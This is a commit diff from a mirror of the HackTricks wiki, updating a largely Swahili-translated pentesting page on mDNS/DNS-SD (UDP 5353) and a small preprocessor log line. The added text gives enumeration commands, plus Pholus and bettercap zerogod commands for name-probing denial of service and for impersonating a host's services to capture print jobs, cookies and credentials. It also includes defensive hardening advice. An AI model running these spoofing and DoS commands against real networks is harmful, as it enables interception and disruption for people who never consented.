maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/5353-udp-multicast-dns-mdns

Browse Source
This commit is contained in:
Translator 2025-08-20 14:17:08 +00:00
parent 8213bd5bd8
commit 167f92c8b1
2 changed files with 121 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
hacktricks-preprocessor.py
View File

@ -65,7 +65,7 @@ def ref(matchobj):
dir = path.dirname(current_chapter['source_path'])
rel_path = path.normpath(path.join(dir,href))
try:
logger.debug(f'Error getting chapter title: {href} trying with relative path {rel_path}')
logger.debug(f'Not found chapter title from: {href} -- trying with relative path {rel_path}')
if "#" in href:
chapter, _path = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
title = " ".join(href.split("#")[1].split("-")).title()

148
src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
View File

@ -2,52 +2,142 @@
{{#include ../banners/hacktricks-training.md}}
## **Taarifa za Msingi**
## Taarifa za Msingi
**Multicast DNS (mDNS)** inaruhusu **operesheni kama za DNS** ndani ya mitandao ya ndani bila kuhitaji seva ya jadi ya DNS. Inafanya kazi kwenye **UDP port 5353** na inaruhusu vifaa kugundua kila mmoja na huduma zao, ambayo mara nyingi inaonekana katika vifaa mbalimbali vya IoT. **DNS Service Discovery (DNS-SD)**, ambayo mara nyingi hutumika pamoja na mDNS, inasaidia katika kubaini huduma zinazopatikana kwenye mtandao kupitia maswali ya kawaida ya DNS.
Multicast DNS (mDNS) inaruhusu ufumbuzi wa majina kama DNS na ugunduzi wa huduma ndani ya kiungo cha ndani bila seva ya unicast DNS. Inatumia UDP/5353 na anwani za multicast 224.0.0.251 (IPv4) na FF02::FB (IPv6). Ugunduzi wa Huduma za DNS (DNS-SD, kwa kawaida hutumika na mDNS) unatoa njia iliyo sanifishwa ya kuorodhesha na kuelezea huduma kupitia rekodi za PTR, SRV na TXT.
```
PORT STATE SERVICE
5353/udp open zeroconf
```
### **Uendeshaji wa mDNS**
Key protocol details youll often leverage during attacks:
- Majina katika eneo la .local yanatatuliwa kupitia mDNS.
- QU (Query Unicast) bit inaweza kuomba majibu ya unicast hata kwa maswali ya multicast.
- Utekelezaji unapaswa kupuuza pakiti zisizo na chanzo kutoka kwa kiungo cha ndani; baadhi ya stacks bado zinakubali hizo.
- Kuchunguza/kutangaza kunalazimisha majina ya kipekee ya mwenyeji/huduma; kuingilia hapa kunaweza kuunda hali za DoS/“name squatting”.
Katika mazingira yasiyo na seva ya DNS ya kawaida, mDNS inaruhusu vifaa kutatua majina ya kikoa yanayomalizika na **.local** kwa kuuliza anwani ya multicast **224.0.0.251** (IPv4) au **FF02::FB** (IPv6). Vipengele muhimu vya mDNS ni pamoja na thamani ya **Time-to-Live (TTL)** inayonyesha uhalali wa rekodi na **QU bit** inayotofautisha kati ya maswali ya unicast na multicast. Kwa upande wa usalama, ni muhimu kwa utekelezaji wa mDNS kuthibitisha kwamba anwani ya chanzo ya pakiti inalingana na subnet ya ndani.
## DNS-SD service model
### **Uendeshaji wa DNS-SD**
Huduma zinatambulishwa kama _<service>._tcp au _<service>._udp chini ya .local, kwa mfano _ipp._tcp.local (printa), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge), n.k. Gundua aina kwa _services._dns-sd._udp.local, kisha tatua mifano iliyogunduliwa kwa SRV/TXT/A/AAAA.
DNS-SD inarahisisha ugunduzi wa huduma za mtandao kwa kuuliza rekodi za pointer (PTR) ambazo zinachora aina za huduma kwa mifano yao. Huduma zinatambulishwa kwa kutumia muundo wa **\_\<Service>.\_tcp au \_\<Service>.\_udp** ndani ya kikoa cha **.local**, na kusababisha ugunduzi wa rekodi zinazolingana za **SRV** na **TXT** ambazo zinatoa maelezo ya kina kuhusu huduma.
## Network Exploration and Enumeration
### **Uchunguzi wa Mtandao**
#### **Matumizi ya nmap**
Amri inayofaa kwa ajili ya skanning mtandao wa ndani kwa huduma za mDNS ni:
- nmap target scan (direct mDNS on a host):
```bash
nmap -Pn -sUC -p5353 [target IP address]
nmap -sU -p 5353 --script=dns-service-discovery <target>
```
Amri hii husaidia kubaini bandari za mDNS zilizo wazi na huduma zinazotangazwa juu yao.
#### **Uhesabu wa Mtandao kwa kutumia Pholus**
Ili kutuma maombi ya mDNS kwa shughuli na kukamata trafiki, chombo cha **Pholus** kinaweza kutumika kama ifuatavyo:
- nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):
```bash
sudo python3 pholus3.py [network interface] -rq -stimeout 10
sudo nmap --script=broadcast-dns-service-discovery
```
## Mashambulizi
### **Kunutia mDNS Probing**
Njia ya shambulio inahusisha kutuma majibu ya uongo kwa mDNS probes, ikionyesha kwamba majina yote yanayowezekana tayari yanatumika, hivyo kuzuia vifaa vipya kuchagua jina la kipekee. Hii inaweza kufanywa kwa kutumia:
- avahi-browse (Linux):
```bash
sudo python pholus.py [network interface] -afre -stimeout 1000
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
```
- Apple dns-sd (macOS):
```bash
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
```
- Packet capture with tshark:
```bash
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
```
Teknolojia hii inazuia vifaa vipya kujiandikisha huduma zao kwenye mtandao.
**Kwa muhtasari**, kuelewa jinsi mDNS na DNS-SD zinavyofanya kazi ni muhimu kwa usimamizi wa mtandao na usalama. Zana kama **nmap** na **Pholus** hutoa maarifa muhimu kuhusu huduma za mtandao wa ndani, wakati ufahamu wa hatari zinazoweza kutokea husaidia katika kulinda dhidi ya mashambulizi.
Tip: Baadhi ya vivinjari/WebRTC hutumia majina ya mDNS ya muda mfupi kuficha IP za ndani. Ikiwa unaona wagombea random-UUID.local kwenye waya, watatue kwa mDNS ili kuhamasisha IP za ndani.
### Spoofing/MitM
## Attacks
Shambulio la kuvutia zaidi ambalo unaweza kutekeleza kupitia huduma hii ni kufanya **MitM** katika **mawasiliano kati ya mteja na seva halisi**. Unaweza kuwa na uwezo wa kupata faili nyeti (MitM mawasiliano na printer) au hata akidi (uthibitishaji wa Windows).\
### mDNS name probing interference (DoS / name squatting)
Wakati wa awamu ya kuchunguza, mwenyeji anachunguza upekee wa jina. Kujibu kwa migongano ya kudanganya kunalazimisha kuchagua majina mapya au kushindwa. Hii inaweza kuchelewesha au kuzuia usajili wa huduma na ugunduzi.
Example with Pholus:
```bash
# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000
```
### Huduma za kudanganya na kujifanya (MitM)
Jifanya kama huduma za DNS-SD zinazotangazwa (printa, AirPlay, HTTP, kushiriki faili) ili kuwashawishi wateja kuungana na wewe. Hii ni muhimu hasa kwa:
- Kukamata hati kwa kudanganya _ipp._tcp au _printer._tcp.
- Kuwavutia wateja kwenye huduma za HTTP/HTTPS ili kukusanya tokens/cookies au kupeleka payloads.
- Kuunganisha na mbinu za NTLM relay wakati wateja wa Windows wanaposhughulikia uthibitisho kwa huduma zilizodanganywa.
Kwa moduli ya zerogod ya bettercap (mDNS/DNS-SD spoofer/impersonator):
```bash
# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"
# Show all services seen from a host
> zerogod.show 192.168.1.42
# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42
# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42
# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml
```
Pia angalia LLMNR/NBNS/mDNS/WPAD spoofing na workflows za kukamata/kuhamasisha akidi:
{{#ref}}
../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
{{#endref}}
### Maelezo kuhusu masuala ya utekelezaji wa hivi karibuni (yenye manufaa kwa DoS/kuendelea wakati wa ushirikiano)
- Avahi reachable-assertion na D-Bus crash bugs (2023) zinaweza kumaliza avahi-daemon kwenye usambazaji wa Linux (e.g. CVE-2023-38469..38473, CVE-2023-1981), kuharibu ugunduzi wa huduma kwenye mwenyeji wa lengo hadi upya.
- Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (2024, CVE-2024-20303) inaruhusu washambuliaji wa karibu kuendesha CPU kubwa na kuunganisha APs. Ikiwa unakutana na mDNS gateway kati ya VLANs, kuwa makini na utulivu wake chini ya mDNS isiyo sahihi au ya kiwango cha juu.
## Maoni ya kujihami na OPSEC
- Mipaka ya segment: Usiruhusu 224.0.0.251/FF02::FB kati ya maeneo ya usalama isipokuwa mDNS gateway inahitajika wazi. Ikiwa lazima uunganishe ugunduzi, pendelea orodha za ruhusa na mipaka ya kiwango.
- Windows endpoints/servers:
- Ili kuzima kabisa ufafanuzi wa majina kupitia mDNS weka thamani ya rejista na upya:
```
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
```
- Katika mazingira yanayosimamiwa, zima sheria ya Windows Defender Firewall ya “mDNS (UDP-In)” (angalau kwenye profaili ya Domain) ili kuzuia usindikaji wa mDNS wa ndani huku ukihifadhi kazi za nyumbani/kuhamahama.
- Kwenye toleo jipya la Windows 11/GPO templates, tumia sera “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” na uweke kuwa Disabled.
- Linux (Avahi):
- Funga kuchapisha wakati sio muhimu: weka `disable-publishing=yes`, na punguza interfaces kwa `allow-interfaces=` / `deny-interfaces=` katika `/etc/avahi/avahi-daemon.conf`.
- Fikiria `check-response-ttl=yes` na epuka `enable-reflector=yes` isipokuwa inahitajika kwa dharura; pendelea `reflect-filters=` orodha za ruhusa unaporeflect.
- macOS: Punguza mDNS ya ndani kwenye moto wa mwenyeji/mtandao wakati ugunduzi wa Bonjour hauhitajiki kwa subnet maalum.
- Ufuatiliaji: Onya juu ya ongezeko la kawaida katika maswali ya `_services._dns-sd._udp.local` au mabadiliko ya ghafla katika SRV/TXT za huduma muhimu; hizi ni dalili za spoofing au uigaji wa huduma.
## Kumbukumbu ya haraka ya zana
- nmap NSE: `dns-service-discovery` na `broadcast-dns-service-discovery`.
- Pholus: skana hai, mzunguko wa nyuma wa mDNS, DoS na wasaidizi wa spoofing.
```bash
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
```
- bettercap zerogod: gundua, hifadhi, tangaza, na uigize huduma za mDNS/DNS-SD (angalia mifano hapo juu).
## Spoofing/MitM
Shambulio la kuvutia zaidi ambalo unaweza kufanya juu ya huduma hii ni kufanya MitM katika mawasiliano kati ya mteja na seva halisi. Unaweza kuwa na uwezo wa kupata faili nyeti (MitM mawasiliano na printer) au hata akidi (uthibitisho wa Windows).\
Kwa maelezo zaidi angalia:
{{#ref}}
@ -57,5 +147,7 @@ Kwa maelezo zaidi angalia:
## Marejeleo
- [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical_IoT_Hacking.html?id=GbYEEAAAQBAJ&redir_esc=y)
- [Nmap NSE: broadcast-dns-service-discovery](https://nmap.org/nsedoc/scripts/broadcast-dns-service-discovery.html)
- [bettercap zerogod (mDNS/DNS-SD discovery, spoofing, impersonation)](https://www.bettercap.org/modules/ethernet/zerogod/)
{{#include ../banners/hacktricks-training.md}}